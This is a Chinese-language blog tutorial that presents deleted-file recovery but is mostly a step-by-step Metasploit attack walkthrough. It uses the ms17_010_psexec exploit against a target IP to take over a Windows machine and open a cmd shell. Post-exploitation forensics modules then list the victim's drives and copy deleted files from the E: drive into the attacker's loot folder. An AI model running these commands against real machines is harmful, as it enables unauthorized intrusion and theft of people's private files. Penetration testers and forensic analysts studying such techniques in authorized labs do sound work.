黑客是如何恢复任意删除的文件?回收站清空的也可以!

相关阅读

数据恢复

取证相关

Kali linux

Metasploit

Kali linux本身就自带,如果你觉得还不满足可以尝试Pro

视频讲解

你是否会遇到不小心删除了文件,同时清空了回收站?本期视频带你一起看看,黑客在入侵后是如何对删除文件进行恢复、并完成取证的,如何通过metasploit框架恢复电脑磁盘里删除过的文件!

图文讲解

接管目标计算机

启动Metasploit渗透测试框架

sudo msfconsole

搜索eternal模块

search eternal
图片[1]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog

使用编号1的模块exploit/windows/smb/ms17_010_psexec

use 1
图片[2]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog

然后设置目标服务器的IP地址

set RHOSTS 192.168.0.186
图片[3]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog

然后运行

exploit

这里显示已经接管了目标机器

图片[4]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog

您可以输入下面的命令接管windows电脑的cmd终端

shell
图片[5]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog

输入下面的命令可以退出进行我们的后续操作

exit

我们继续输入下面的命令,让会话在后台运行

background
图片[6]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog

数据恢复与取证

接下来是我们每个人最关注的,如何恢复我们删除的文件?

我们将使用post/windows/gather/forensics/enum_drives模块

use post/windows/gather/forensics/enum_drives
图片[7]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog

然后我们刚才在后台运行的会话是SESSION 1,因此我们需要设置该模块针对的会话是SESSION 1

set SESSION 1

然后运行

run

这里我们可以看到驱动盘

图片[8]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog

我们这里可以直接下一步,开始恢复E盘的数据,使用post/windows/gather/forensics/recovery_files模块

use post/windows/gather/forensics/recovery_files

然后设置磁盘为E盘,因为我们一开始是在E盘删除的文件

set DRIVE E:

然后设置会话为SESSION 1

set SESSION 1
图片[9]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog

然后运行该模块

run

我们发现这里已经找到了两个被回收站删掉的文件

图片[10]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog

我们这里尝试进行恢复

set FILES 356909056,356910080

上面设置的文件要填写刚才我们找到的文件ID编号

然后运行

run

我们可以看到文件已经恢复到了/root/.msf4/loot目录下

图片[11]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog

我们进入对应的路径

cd /root/.msf4/loot

使用cat命令查看其中的文件,发现和删除的简直一模一样,到这里恢复数据、进行取证就结束了!

图片[12]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog

希望今天的教程你能学到很多😊

© 版权声明
THE END
喜欢就支持一下吧
点赞40赞赏 分享
评论 共12条

请登录后发表评论